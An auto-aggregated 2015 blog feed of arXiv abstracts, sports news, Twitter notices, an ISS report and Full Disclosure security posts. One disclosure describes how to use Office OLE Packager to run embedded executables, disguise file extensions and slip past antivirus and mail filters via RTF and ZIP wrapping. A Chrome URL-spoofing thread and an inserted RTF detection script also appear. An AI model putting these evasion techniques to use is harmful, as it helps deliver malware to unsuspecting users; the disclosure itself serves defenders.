via IFTTT

Online Transfer Learning in Reinforcement Learning Domains. (arXiv:1507.00436v1 [cs.AI])

This paper proposes an online transfer framework to capture the interaction among agents and shows that current transfer learning in reinforcement learning is a special case of online transfer. Furthermore, this paper re-characterizes existing agents-teaching-agents methods as online transfer and analyzes one such teaching method in three ways. First, the convergence of Q-learning and Sarsa with tabular representation with a finite budget is proven. Second, the convergence of Q-learning and Sarsa with linear function approximation is established. Third, we show the asymptotic performance cannot be hurt through teaching. Additionally, all theoretical results are empirically validated.



from cs.AI updates on arXiv.org http://ift.tt/1LYiOWK
via IFTTT

Self-Learning Cloud Controllers: Fuzzy Q-Learning for Knowledge Evolution. (arXiv:1507.00567v1 [cs.SY])

Cloud controllers aim at responding to application demands by automatically scaling the compute resources at runtime to meet performance guarantees and minimize resource costs. Existing cloud controllers often resort to scaling strategies that are codified as a set of adaptation rules. However, for a cloud provider, applications running on top of the cloud infrastructure are more or less black-boxes, making it difficult at design time to define optimal or pre-emptive adaptation rules. Thus, the burden of taking adaptation decisions often is delegated to the cloud application. Yet, in most cases, application developers in turn have limited knowledge of the cloud infrastructure. In this paper, we propose learning adaptation rules during runtime. To this end, we introduce FQL4KE, a self-learning fuzzy cloud controller. In particular, FQL4KE learns and modifies fuzzy rules at runtime. The benefit is that for designing cloud controllers, we do not have to rely solely on precise design-time knowledge, which may be difficult to acquire. FQL4KE empowers users to specify cloud controllers by simply adjusting weights representing priorities in system goals instead of specifying complex adaptation rules. The applicability of FQL4KE has been experimentally assessed as part of the cloud application framework ElasticBench. The experimental results indicate that FQL4KE outperforms our previously developed fuzzy controller without learning mechanisms and the native Azure auto-scaling.



from cs.AI updates on arXiv.org http://ift.tt/1IwX1GP
via IFTTT

Scalable Link Prediction in Dynamic Networks via Non-Negative Matrix Factorization. (arXiv:1411.3675v2 [cs.SI] UPDATED)

We propose a scalable temporal latent space model for link prediction in dynamic social networks, where the goal is to predict links over time based on a sequence of previous graph snapshots. The model assumes that each user lies in an unobserved latent space and interactions are more likely to form between similar users in the latent space representation. In addition, the model allows each user to gradually move its position in the latent space as the network structure evolves over time. We present a global optimization algorithm to effectively infer the temporal latent space, with a quadratic convergence rate. Two alternative optimization algorithms with local and incremental updates are also proposed, allowing the model to scale to larger networks without compromising prediction accuracy. Empirically, we demonstrate that our model, when evaluated on a number of real-world dynamic networks, significantly outperforms existing approaches for temporal link prediction in terms of both scalability and predictive power.



from cs.AI updates on arXiv.org http://ift.tt/1uicHXs
via IFTTT

Bradley replaces Dempsey as US captain for CONCACAF Gold Cup

CHICAGO (AP) Michael Bradley will be the U.S. captain for the CONCACAF Gold Cup rather than Clint Dempsey.

from FOX Sports Digital http://ift.tt/1GSCwPj
via IFTTT

Guzan, US seek to maintain momentum against Guatemala

NASHVILLE, Tenn. (AP) Goalkeeper Brad Guzan is intent on following up a disappointing spring with a sizzling summer, giving the United States reason for optimism as it heads into the CONCACAF Gold Cup.

from FOX Sports Digital http://ift.tt/1LGTzu8
via IFTTT

I have a new follower on Twitter


rocio
Ma'am, don't you think you're already too old to be taking your doll out for a walk?


Following: 808 - Followers: 47

July 02, 2015 at 05:02PM via Twitter http://twitter.com/biebsrocio798

Copa America huge chance for Chile to finally win big title

SANTIAGO, Chile (AP) It feels like it's now or never for Chile.

from FOX Sports Digital http://ift.tt/1HzgqpV
via IFTTT

Re: [FD] Google Chrome Address Spoofing (Request For Comment)

[FD] Microsoft Office - OLE Packager allows code execution in all Office versions, with macros disabled and high security templates applied

All,

OLE Packager is a feature introduced in Windows 3.1, which ran "up to" Windows XP: http://ift.tt/1HyfuUy

It is still present in every version of Microsoft Office, on every Windows OS. It allows you to embed any file into Office documents. It is also very dangerous and there is no way to disable it.

To test, open Word 2010/2013 and select Insert -> Object -> Create from File, and drop an executable into the document. Double clicking the executable then spawns the executable. You can also right click the file name, to change the name and use a custom icon. You can use the Draw functions to draw a white box over the file extension.

This isn't new (although I think most people aren't aware this function is still active). There's all sorts of problems, though:

- You can bypass many mail gateways and antivirus products by simply saving the document as an .RTF file - these also support OLE Packager objects. Most products I've tested fail to scan for Packager objects inside RTF files, which are in turn then opened in Word by default.
- A dll file called packager.dll is used to determine if the file extension can execute code via a static list, and displays a warning for the user to click through. There is no way to disable the Packager functionality, so every Enterprise/Gov/Org/user has this functionality enabled right now.
- The DLL file hasn't been kept up to date. For example, you can use .PS1 (PowerShell) embeds without any security warning. There's a lot of file types now you can execute code with without warning, basically.
- You can also embed executable code within ZIP files, to completely bypass the warning.
- The files are executed from your %appdata% folder, which is trusted for things such as Windows Scripting Host. So for example, you can use malicious .js files to execute full code, wrapped in a ZIP, with absolutely no warning to the user nor ability to disable the functionality, even with Group Policy/high security Office templates etc.

I've tried this technique with most of the large cloud based email filtering companies and it just sails past them. I've also tried two anti-exploit products (Malwarebytes Anti-Exploit and a company I won't name due to NDA) and it doesn't trigger their protection. No antivirus product detected anything suspect during testing.

I notified Microsoft of my research back in March, but from the dialogue I've had it's a supported feature dating back to the early 90s. It also appears to be supported going forward. I think it blows apart security models and basically provides an easy way to detonate code on PCs far behind firewalls - my belief is organisations should be able to disable this feature, and it should probably be disabled by default in future Office versions.

As a mitigation, you can install Microsoft EMET and manually add packager.dll to ASR.

--Kevin

Source: Gmail -> IFTTT-> Blogger
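A defender-side check for the RTF scanning gap the post above describes, as an added example that is not part of the original post: it walks the `\objdata` groups of an RTF file, decodes the OLE1 object header and reports every embedded object whose class is Package, whatever its extension. The sample document is constructed, the function names are hypothetical, the position of the Packager label (a NUL-terminated string after a 2-byte header) is an assumed layout, and `\objdata` obfuscated with nested groups or control words is not handled.

```python
import os
import re
import struct

# \objdata followed by hex digits, possibly split by spaces and newlines.
OBJDATA_RE = re.compile(rb"\\objdata(?![a-zA-Z])([^{}\\]*)")


def _lp_string(s):
    """OLE1 length-prefixed ANSI string: uint32 length (incl. NUL), bytes, NUL."""
    if not s:
        return struct.pack("<I", 0)          # empty string is a bare zero length
    return struct.pack("<I", len(s) + 1) + s + b"\x00"


def build_sample_rtf(class_name, label):
    """Constructed test input: RTF with one embedded OLE1 object, harmless payload."""
    payload = b"constructed placeholder content"
    # Only the 2-byte header and the label are relied on; the rest is filler.
    native = (b"\x02\x00" + label + b"\x00"
              + b"C:\\constructed\\" + label + b"\x00" + payload)
    ole1 = (struct.pack("<II", 0x00000501, 2)            # OLEVersion, FormatID
            + _lp_string(class_name) + _lp_string(b"") + _lp_string(b"")
            + struct.pack("<I", len(native)) + native)   # NativeDataSize, data
    hexdata = ole1.hex().encode()
    wrapped = b"\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return (b"{\\rtf1\\ansi Constructed sample\\par "
            + b"{\\object\\objemb{\\*\\objclass " + class_name + b"}"
            + b"{\\*\\objdata " + wrapped + b"}}}")


def _read_lp(blob, pos):
    (length,) = struct.unpack_from("<I", blob, pos)
    pos += 4
    if length > len(blob) - pos:
        raise ValueError("length-prefixed string runs past end of data")
    return blob[pos:pos + length].rstrip(b"\x00"), pos + length


def parse_ole1(blob):
    """Return (class_name, native_data) from an OLE1 embedded-object blob."""
    struct.unpack_from("<II", blob, 0)       # OLEVersion, FormatID (must exist)
    class_name, pos = _read_lp(blob, 8)
    _topic, pos = _read_lp(blob, pos)
    _item, pos = _read_lp(blob, pos)
    (size,) = struct.unpack_from("<I", blob, pos)
    return class_name, blob[pos + 4:pos + 4 + size]


def package_label(native):
    """Assumed Packager layout: 2-byte header, then the NUL-terminated label."""
    end = native.find(b"\x00", 2)
    return native[2:end].decode("latin-1") if end > 2 else ""


def scan_rtf(data):
    """List every embedded Package object found in the RTF bytes."""
    findings = []
    for match in OBJDATA_RE.finditer(data):
        hexchars = re.sub(rb"[^0-9A-Fa-f]", b"", match.group(1))
        hexchars = hexchars[:len(hexchars) // 2 * 2]     # drop a dangling nibble
        try:
            class_name, native = parse_ole1(bytes.fromhex(hexchars.decode("ascii")))
        except (struct.error, ValueError):
            continue                                     # not a parseable OLE1 blob
        if class_name.lower() != b"package":
            continue
        label = package_label(native)
        findings.append({
            "class": class_name.decode("latin-1"),
            "label": label,
            "extension": os.path.splitext(label)[1].lower(),
        })
    return findings


if __name__ == "__main__":
    for hit in scan_rtf(build_sample_rtf(b"Package", b"invoice.js")):
        print("embedded Package object:", hit)
```

Because the post reports that the extension warning list is incomplete and can be sidestepped with a ZIP wrapper, the check flags the Package class itself and reports the extension only for triage.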

[FD] CVE-2015-3442 Authentication Bypass in Xpert.Line Version 3.0

#############################################################
#
# COMPASS SECURITY ADVISORY
# http://ift.tt/JChVZk
#
#############################################################
#
# Product: Xpert.Line
# Vendor: Soreco AG [1]
# CVE ID: CVE-2015-3442
# Subject: Authentication Bypass
# Risk: Critical
# Effect: Remotely exploitable
# Author: Alessandro Zala (alessandro.zala@csnc.ch)
#         Andreas Hunkeler (andreas.hunkeler@csnc.ch)
# Date: 06.03.2015
#
#############################################################

Introduction:

Source: Gmail -> IFTTT-> Blogger

I have a new follower on Twitter


Sendfiles2.me
Sendfiles2.me makes getting files from others easier. Tweets by @malibey
localhost
http://t.co/lKQoKuNoRp
Following: 4567 - Followers: 5984

July 02, 2015 at 01:14PM via Twitter http://twitter.com/sendfiles2me

AC Milan signs striker Carlos Bacca from Sevilla

SEVILLE, Spain (AP) AC Milan has acquired Colombia striker Carlos Bacca on a transfer from Spanish club Sevilla.

from FOX Sports Digital http://ift.tt/1f5BKsm
via IFTTT

Turmoil in Russian football as government limits foreigners

MOSCOW (AP) With just 10 days until the start of the new season, Russian football clubs' transfer plans risk being upended as the government threatens to cut the number of foreign players they can field.

from FOX Sports Digital http://ift.tt/1FV9ZI6
via IFTTT

UEFA confirms Rubin Kazan to get Europa League place

MOSCOW (AP) UEFA has confirmed that Rubin Kazan will replace fellow Russian club Dynamo Moscow in the Europa League after the latter broke financial fair play rules.

from FOX Sports Digital http://ift.tt/1NzaXAd
via IFTTT

ISS Daily Summary Report – 07/01/15

ISSpresso: Kelly performed troubleshooting on the ISSpresso.  He was instructed to remove a deformed capsule lodged in the chamber and proceed with a nominal brewing.  The ISSpresso machine is a technical demonstration experiment that has the capability to provide hot beverages including espresso and still maintain the crema when dispensed in space. Capillary Effects of Drinking in the Microgravity Environment (Capillary Beverage): Microgravity affects the way fluids behave, and as such, crew members must drink from special sealed bags instead of using straws or normal cups. Capillary Beverage studies the process of drinking from specially designed Space Cups that use fluid dynamics to mimic the effect of gravity. In this instance of Capillary Beverage, Kelly used Black Kona Coffee to demonstrate how a complex fluid reacts to the cup’s special designs in an attempt to mimic the gravitational flow of a liquid through capillary forces. High definition video was used to capture the data and will be analyzed on the ground. Journals: Kelly authored a Journal entry today in support of the Behavioral Issues Associated with Isolation and Confinement: Review and Analysis of Astronaut Journals experiment.  Journals provides information on behavioral and human issues that are relevant to the design of equipment and procedures and sustained human performance during extended-duration missions. Study results provide information to help prepare for future missions to low-Earth orbit and beyond. Habitability: Kelly is scheduled to use the iShort tablet application to capture observations regarding the habitability onboard the ISS. Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations such as Near Earth Asteroids (NEA) and Mars. 
The ultimate goal is to understand how much habitable volume is required for vehicle internal design and layout, and if mission duration impacts the volume needed. Observations during the 1-year mission, as well as 6-month missions, can help spacecraft designers understand how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need. The iShort application will enable ground support teams and human factor engineers to study and evaluate the design of the ISS and use these results for future spacecraft. Rodent Research Inventory: Kelly continued his review of on-orbit consumables and hardware required for Rodent Research operations.  The information gathered during this inventory is being used to determine what cargo is required for future manifests to support Rodent Research.  Following the loss of SpaceX-7, upmass availability is at a premium and this data point will provide ground teams with the knowledge of what is required to fly to the ISS while minimizing duplication. Acoustic Dosimeter Operations: Kelly set up the Acoustic Dosimeter to take sound measurements on the ISS. For crew-worn sessions the dosimeter was donned directly after crew wake and will be worn for 24 hours after which measurements will be recorded. For static deploy sessions, dosimeters will be deployed in the Node 3 and Cupola for approximately 24 hours. Japanese Experiment Module Remote Manipulator System (JEMRMS) Console Checkout: Kelly completed  a checkout of the JEMRMS Console.  During the checkout the Camera Control Panel (CCP), Remote Interface Panel (RIP), RMS monitor and hand controllers were activated. This activity is in preparation for HTV5 operations planned in August. Today’s Planned Activities All activities were completed unless otherwise noted. Inspecting RS Structural Elements Shell Surfaces using МВП-2К device. 
/ r/g 9204, 9218 Audio Dosimeter Preparation JEMRMS – Final Activation before JEMRMS console checkout ISSpresso Brewing VIZIR. Battery charge preparation and initiation / r/g 9217 JEMRMS – Console checkout JEMRMS – Deactivation preparation after JEMRMS checkout Capillary Beverage MWA Preparation Capillary Beverage P/L Deployment SM Ventilation System Preventive Maintenance r/g 8393 Capillary Beverage Test Operations Data prep on monitoring RSOS structural surfaces for downlink / r/g 9204 UDOD. Experiment ops using DYKNANIYE-1 and SPRUT-2 sets. / r/g 9210 Capillary Beverage Stowage Journal – Survey Completion Habitability And Human Factors.  Observations Subject. Node 2 Nadir hatch reconfig to nominal, fully latched configuration LAB and Cupola Display and Control Panel (DCP) Powerdown Audit Life Science Hardware stowed in the COL AFT locations. VIZIR. Battery Charge / r/g 9217 IMS Delta File Prep ABOUT GAGARIN FROM SPACE. HAM Radio Session / r/g 9211 Stow Earlier Installed Formaldehyde Monitoring Kit (FMK) VZAIMODEISTVIYE-2. Experiment Ops / r/g 9213 Vacuum Pressure Gauge Accuracy Check / r/g 9212 WRS – Recycle Tank Fill VIZIR. Battery Charge  Completed Task List Items None  Ground Activities All activities were completed unless otherwise noted. 
METEON commanding JEMRMS ops OASIS video

Three-Day Look Ahead:
Thursday, 07/02: Multi-user Droplet Combustion Apparatus MWA Prep, CIR Hardware Review/hardware gather, HRF2 Supply Kit Resupply, Reconnection of MagVector Umbilicals to COL1F2 UIP
Friday, 07/03: JEMRMS BDS Reconfig/checkout, Acoustic Dosimeters data transfer/stow, BCAT Intervalometer Change, MDCA h/w replace, 60P Launch (184/04:55 GMT, 7/2 23:55 CDT)
Saturday, 07/04: Crew off duty, housekeeping

QUICK ISS Status – Environmental Control Group:

Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): On
[СКВ] 2 – SM Air Conditioner System (“SKV2”): Off
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Shutdown
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Standby
Urine Processing Assembly (UPA): Process
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/1H3ijcX
via IFTTT

Homes of Dinamo Zagreb bosses raided by Croatian police

ZAGREB, Croatia (AP) Croatian police have raided the homes and offices of the Dinamo Zagreb bosses who are suspected of tax evasion and bribery.

from FOX Sports Digital http://ift.tt/1IR434X
via IFTTT

How to Anonymously Access Wi-Fi from 2.5 Miles Away Using This Incredible Device

Anonymity is something that seems next to impossible in this era of government surveillance. Even Tor and VPNs no longer seem to be enough to protect user privacy. Once your IP address is discovered, it's game over! However, a method has been devised that not only allows users to anonymously connect to a public Wi-Fi network, but also lets them connect from about 2.5 miles away.


from The Hacker News http://ift.tt/1LFshEs
via IFTTT

China's Evergrande Taobao team applies for stock listing

HONG KONG (AP) Chinese soccer team Guangzhou Evergrande Taobao, owned by e-commerce giant Alibaba and one of the country's biggest property developers, has applied for a listing on a Chinese stock market.

from FOX Sports Digital http://ift.tt/1HziEHC
via IFTTT

Hand grenade found at Red Star stadium

BELGRADE, Serbia (AP) Serbian Police say they have found an unexploded hand grenade at the Red Star stadium in Belgrade ahead of a Europa League qualifier match.

from FOX Sports Digital http://ift.tt/1R6Z6yQ
via IFTTT

These Laser Beams Will Offer Free Internet to the World from the Sky

During a wide-ranging online question-and-answer session on his Facebook page Tuesday, Facebook co-founder Mark Zuckerberg predicted some wild things for the future. They include: telepathy technology, the ability for humans to talk to each other with their minds; laser beams, used to transmit data from the sky to Earth; and the growth of artificial intelligence and virtual reality. Today, Mark


from The Hacker News http://ift.tt/1UbuoUe
via IFTTT

US files formal extradition request for 7 FIFA officials

ZURICH (AP) The United States has submitted a formal request for Switzerland to extradite seven FIFA officials arrested as part of a corruption probe in Zurich in May, Swiss officials said Thursday.

from FOX Sports Digital http://ift.tt/1FTZe8N
via IFTTT

Apple Releases dozens of Security Updates to Fix OS X and iOS Flaws

Apple has released updates to patch dozens of security vulnerabilities in the iOS and OS X Yosemite operating systems. The updates include the iOS 8.4 version of the mobile operating system, OS X Yosemite 10.10.4 and Security Update 2015-005.

iOS 8.4 Update

The iOS 8.4 update includes patches for over 20 security vulnerabilities that could lead to remote code execution (RCE), application


from The Hacker News http://ift.tt/1GPFnJU
via IFTTT

Switzerland: US seeks extradition of 7 FIFA officials

BERLIN (AP) Swiss justice officials say they have received a formal request from the United States to extradite seven FIFA officials arrested in Zurich in May.

from FOX Sports Digital http://ift.tt/1LF5msX
via IFTTT

I have a new follower on Twitter


Dragon
Miss you bro. Rip FHS 76-10
Houston, Tx

Following: 1824 - Followers: 495

July 02, 2015 at 02:09AM via Twitter http://twitter.com/mhsantiesteban

I have a new follower on Twitter


Laurel Robbins
Inspired by nature, fuelled by curiosity, on a mission to get people outdoors. Adventure travel blogger at http://t.co/cSETsmEVMp. Co-founder of #AdvTravelChat
Munich, Germany
http://t.co/cSETsmWwDX
Following: 36452 - Followers: 62811

July 02, 2015 at 02:09AM via Twitter http://twitter.com/Laurel_Robbins

Venus, Jupiter, and Noctilucent Clouds


Have you seen the passing planets yet? Today the planets Jupiter and Venus pass within half a degree of each other as seen from Earth. This conjunction, visible all over the world, is quite easy to see -- just look to the west shortly after sunset. The brightest objects visible above the horizon will be Venus and Jupiter, with Venus being the brighter of the two. Featured above, the closing planets were captured two nights ago in a sunset sky graced also by high-level noctilucent clouds. In the foreground, the astrophotographer's sister takes in the vista from a bank of the Sec Reservoir in the Czech Republic. She reported this as the first time she has seen noctilucent clouds. Jupiter and Venus will appear even closer together tonight and will continue to be visible in the same part of the sky until mid-August. via NASA http://ift.tt/1IrMOeT

Chicharito injures collarbone as Mexico ties Honduras

HOUSTON (AP) Mexico's Gold Cup chances could take a hit after Tuesday's tune-up game with Honduras. Star forward Javier 'Chicharito' Hernandez left the scoreless draw with a collarbone injury.

from FOX Sports Digital http://ift.tt/1NyjOBo
via IFTTT

Wednesday, July 1, 2015

Chicharito injures collarbone as Mexico ties Honduras

HOUSTON (AP) Mexico forward Javier 'Chicharito' Hernandez left a scoreless draw against Honduras on Wednesday night with a collarbone injury as the teams put the final touches on their Gold Cup preparations.

from FOX Sports Digital http://ift.tt/1dzl6zQ
via IFTTT

Boca Juniors beat Strikers 3-0

FORT LAUDERDALE (AP) Jonathan Calleri and Alexis Rolin scored early in each half to lead Argentina's Boca Juniors to a 3-0 victory over the Fort Lauderdale Strikers on Wednesday night.

from FOX Sports Digital http://ift.tt/1IutLQQ
via IFTTT

Orioles Highlight: JJ Hardy hits go-ahead home run and Wei-Yin Chen holds Rangers to 2 ER over 8 IP in 4-2 win (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Re: [FD] Google Chrome Address Spoofing (Request For Comment)

> We reported this to Google.
> They reproduced, and say
> It's DoS which doesn't matter.
> We think it's very strange,
> since the browser does not crash(not DoS),

I think they called it DOS because the chrome.exe process starts to consume system memory out of control. In my example (Win7 Chrome 43.0.2357.130) it ended up consuming 4GB+ of memory before it finally gave up 3 minutes or so later and issued an error message in both windows. Potentially, with multiple such frames being launched one could make it crash. That's beside the point though as the URL spoofing is clearly there.

--Mike

Source: Gmail -> IFTTT-> Blogger

[FD] iTunes 12.2 and QuickTime 7.7.7 for Windows: still outdated and VULNERABLE 3rd party libraries, still UNQUOTED and VULNERABLE pathnames C:\Program Files\...

[FD] Exploit Code for ipTIME firmwares < 9.58 (root RCE against 127 router models)

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Google Chrome Address Spoofing (Request For Comment)

http://ift.tt/1Nvh080
Big Whale said:
"Tested on Google Chrome 43.0.2357.130 (64-bit) (Linux) and it works"
"clearly URL spoofing"
Thanks for testing!

http://ift.tt/1GYsXS0
0pc0deFR said:
"Work on Google Chrome Ubuntu"
Bonjour, thanks for testing!

http://ift.tt/1T18S30
Daniel Micay said:
"It does display a window with the oracle.com address"
"why you've got an ever increasing number of setTimeout events"
http://ift.tt/1C43XKn
Alexander E. Patrakov said:
"Looks like a fork bomb"
Thanks for testing!
The number of "setTimeout" does NOT need to be increasing forever.
OK, I admit - we are lazy(it works and we don't touch it anymore) :-)

http://ift.tt/1R3EqYq
Roney Gomes said:
"it worked on the desktop version of Opera"
Wow! Thanks for letting us know.
Here is the screenshot of Opera
http://ift.tt/1LVTVLp
And Chrome
http://ift.tt/1IuiaRS
(A number is displayed in Chrome's address bar, not the same as Opera)

http://ift.tt/1GWNdDM
Daniel Micay said:
"it can't always be replicated"
"I've tried it a few times and"
"it fails about as often as it works"
http://ift.tt/1R3EozR
Valentinas Bakaitis said:
"PoC did not work"
Hey! The trick here is timing:
Please modify those numbers in code - make them smaller.

http://ift.tt/1BXeEhG
Zak Siddiqui said:
"Is it reproducible with HTTPS?"
Yes, we just tried this URL
http://ift.tt/16kwqqf
It works.
In fact, it works BETTER against HTTPS, because HTTPS is slower, so timing is easier.

http://ift.tt/1T18PEb
Florian Weimer said:
"they show the new URL while still displaying old content"
Exactly, that's the cause of this bug.

In the end, allow me to repeat:
No user interaction on the fake page.
But, anyone can do "BBB Accredited Business" "PayPal Partner" etc.

Kind Regards,

PS
We love clever tricks.
We love this:
http://dieyu.org/

On 2015/6/30 7:08, David Leo wrote:
> Impact:
> The "click to verify" thing is completely broken...
> Anyone can be "BBB Accredited Business" etc.
> You can make whitehouse.gov display "We love Islamic State" :-)
>
> Note:
> No user interaction on the fake page.
>
> Code:
> ***** index.html
>
> Go
> ***** content.html
> This web page is NOT oracle.com
>
> ***** It's online
> http://ift.tt/1R2ihK7
> (The page says "June/16/2015" - it works as we tested today)
>
> Request For Comment:
> We reported this to Google.
> They reproduced, and say
> It's DoS which doesn't matter.
> We think it's very strange,
> since the browser does not crash(not DoS),
> and the threat is obvious.
> What's your opinion?
>
> Kind Regards,
>
> PS
> We love clever tricks.
> We love this:
> http://dieyu.org/

Source: Gmail -> IFTTT-> Blogger

Top-N recommendations in the presence of sparsity: An NCD-based approach. (arXiv:1507.00043v1 [cs.IR])

Making recommendations in the presence of sparsity is known to present one of the most challenging problems faced by collaborative filtering methods. In this work we tackle this problem by exploiting the innately hierarchical structure of the item space following an approach inspired by the theory of Decomposability. We view the itemspace as a Nearly Decomposable system and we define blocks of closely related elements and corresponding indirect proximity components. We study the theoretical properties of the decomposition and we derive sufficient conditions that guarantee full item space coverage even in cold-start recommendation scenarios. A comprehensive set of experiments on the MovieLens and the Yahoo!R2Music datasets, using several widely applied performance metrics, support our model's theoretically predicted properties and verify that NCDREC outperforms several state-of-the-art algorithms, in terms of recommendation accuracy, diversity and sparseness insensitivity.



from cs.AI updates on arXiv.org http://ift.tt/1NxYv2Q
via IFTTT

Fast Cross-Validation for Incremental Learning. (arXiv:1507.00066v1 [stat.ML])

Cross-validation (CV) is one of the main tools for performance estimation and parameter tuning in machine learning. The general recipe for computing CV estimate is to run a learning algorithm separately for each CV fold, a computationally expensive process. In this paper, we propose a new approach to reduce the computational burden of CV-based performance estimation. As opposed to all previous attempts, which are specific to a particular learning model or problem domain, we propose a general method applicable to a large class of incremental learning algorithms, which are uniquely fitted to big data problems. In particular, our method applies to a wide range of supervised and unsupervised learning tasks with different performance criteria, as long as the base learning algorithm is incremental. We show that the running time of the algorithm scales logarithmically, rather than linearly, in the number of CV folds. Furthermore, the algorithm has favorable properties for parallel and distributed implementation. Experiments with state-of-the-art incremental learning algorithms confirm the practicality of the proposed method.



from cs.AI updates on arXiv.org http://ift.tt/1NxYv2O
via IFTTT

A Tool for Computing and Estimating the Volume of the Solution Space of SMT(LA). (arXiv:1507.00142v1 [cs.AI])

There are already quite a few tools for solving the Satisfiability Modulo Theories (SMT) problems. In this paper, we present VolCE, a tool for counting the solutions of SMT constraints, or in other words, for computing the volume of the solution space. Its input is essentially a set of Boolean combinations of linear constraints, where the numeric variables are either all integers or all reals, and each variable is bounded. The tool extends SMT solving with integer solution counting and volume computation/estimation for convex polytopes. Effective heuristics are adopted, which enable the tool to deal with high-dimensional problem instances efficiently and accurately.



from cs.AI updates on arXiv.org http://ift.tt/1Nx7VMP
via IFTTT

From Causes for Database Queries to Repairs and Model-Based Diagnosis and Back. (arXiv:1507.00257v1 [cs.DB])

In this work we establish and investigate connections between causes for query answers in databases, database repairs wrt. denial constraints, and consistency-based diagnosis. The first two are relatively new research areas in databases, and the third one is an established subject in knowledge representation. We show how to obtain database repairs from causes, and the other way around. Causality problems are formulated as diagnosis problems, and the diagnoses provide causes and their responsibilities. The vast body of research on database repairs can be applied to the newer problems of computing actual causes for query answers and their responsibilities. These connections, which are interesting per se, allow us, after a transition -inspired by consistency-based diagnosis- to computational problems on hitting sets and vertex covers in hypergraphs, to obtain several new algorithmic and complexity results for database causality.



from cs.AI updates on arXiv.org http://ift.tt/1IPiF4P
via IFTTT

Online Learning under Delayed Feedback. (arXiv:1306.0686v2 [cs.LG] CROSS LISTED)

Online learning with delayed feedback has received increasing attention recently due to its several applications in distributed, web-based learning problems. In this paper we provide a systematic study of the topic, and analyze the effect of delay on the regret of online learning algorithms. Somewhat surprisingly, it turns out that delay increases the regret in a multiplicative way in adversarial problems, and in an additive way in stochastic problems. We give meta-algorithms that transform, in a black-box fashion, algorithms developed for the non-delayed case into ones that can handle the presence of delays in the feedback loop. Modifications of the well-known UCB algorithm are also developed for the bandit problem with delayed feedback, with the advantage over the meta-algorithms that they can be implemented with lower complexity.



from cs.AI updates on arXiv.org http://ift.tt/1Jyh8pt
via IFTTT

Toward the Coevolution of Novel Vertical-Axis Wind Turbines. (arXiv:1308.3136v2 [cs.NE] CROSS LISTED)

The production of renewable and sustainable energy is one of the most important challenges currently facing mankind. Wind has made an increasing contribution to the world's energy supply mix, but still remains a long way from reaching its full potential. In this paper, we investigate the use of artificial evolution to design vertical-axis wind turbine prototypes that are physically instantiated and evaluated under fan generated wind conditions. Initially a conventional evolutionary algorithm is used to explore the design space of a single wind turbine and later a cooperative coevolutionary algorithm is used to explore the design space of an array of wind turbines. Artificial neural networks are used throughout as surrogate models to assist learning and found to reduce the number of fabrications required to reach a higher aerodynamic efficiency. Unlike in other approaches, such as computational fluid dynamics simulations, no mathematical formulations are used and no model assumptions are made.



from cs.AI updates on arXiv.org http://ift.tt/1JyhZGO
via IFTTT

Design Mining Interacting Wind Turbines. (arXiv:1410.0547v2 [cs.NE] CROSS LISTED)

An initial study of surrogate-assisted evolutionary algorithms used to design vertical-axis wind turbines wherein candidate prototypes are evaluated under fan generated wind conditions after being physically instantiated by a 3D printer has recently been presented. Unlike other approaches, such as computational fluid dynamics simulations, no mathematical formulations were used and no model assumptions were made. This paper extends that work by exploring alternative surrogate modelling and evolutionary techniques. The accuracy of various modelling algorithms used to estimate the fitness of evaluated individuals from the initial experiments is compared. The effect of temporally windowing surrogate model training samples is explored. A surrogate-assisted approach based on an enhanced local search is introduced; and alternative coevolution collaboration schemes are examined.



from cs.AI updates on arXiv.org http://ift.tt/1Nx7To2
via IFTTT

Design Mining VAWT Wind Farms. (arXiv:1506.08781v1 [cs.NE] CROSS LISTED)

The small body of previous work considering the design of wind farms has used arrays of turbines originally intended to operate alone, optimising the layout of homogeneous turbines essentially as an afterthought in the design process. In this paper, we consider designing wind farms composed of collaborating wind turbines. Computational intelligence is combined with rapid prototyping whereby candidate designs are physically instantiated and evaluated under fan-generated wind conditions. It is shown possible to use surrogate-assisted coevolutionary algorithms to aerodynamically optimise the potentially heterogeneous morphology of an array of 6 small scale and closely positioned vertical-axis wind turbines using the total angular kinetic energy of the array as the objective. This approach performs optimisation in the presence of complex inter-turbine wake effects and multi-directional wind flow from nearby obstacles, which is extremely difficult to achieve accurately under high fidelity computational fluid dynamics simulation. The general approach is equally applicable to the design of other forms of sustainable energy where the characteristics of the environment and/or materials involved are too difficult to accurately simulate.



from cs.AI updates on arXiv.org http://ift.tt/1Nx7TnZ
via IFTTT

Blatter says he has 'clear conscience' despite FIFA probes

BERLIN (AP) FIFA President Sepp Blatter says he is not corrupt and that he has a ''clear conscience'' despite corruption investigations into world soccer's governing body.

from FOX Sports Digital http://ift.tt/1R5O6Se
via IFTTT

Orioles: OF Delmon Young designated for assignment; batting .270 with 2 HRs, 16 RBIs in 52 games this season (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Gundogan extends Borussia Dortmund contract by 1 year

DORTMUND, Germany (AP) Germany midfielder Ilkay Gundogan has extended his contract at Borussia Dortmund, ending speculation he will leave the club this summer.

from FOX Sports Digital http://ift.tt/1KtAGvt
via IFTTT

Brazil to ask former coaches to help improve local football

SAO PAULO (AP) The Brazilian football confederation says it will summon former national team coaches to help find ways of improving football in the country after a series of disappointing results.

from FOX Sports Digital http://ift.tt/1R5kLaA
via IFTTT

Ask an Anonymous Cop: Do You Write More Tickets at the End of the Month?

In the latest installment of Gawker's mailbag Q&A with an anonymous cop—he spent five years with the NYPD and now works as a reserve officer in ...

from Google Alert - anonymous http://ift.tt/1Nw8x5j
via IFTTT

Dutch FA appoints Danny Blind as national coach

THE HAGUE, Netherlands (AP) The Dutch football association has appointed Danny Blind as the Netherlands' national coach, replacing Guus Hiddink, whose contract was terminated Monday.

from FOX Sports Digital http://ift.tt/1U8poQ2
via IFTTT

Messi & Argentina shining together, closer to elusive title

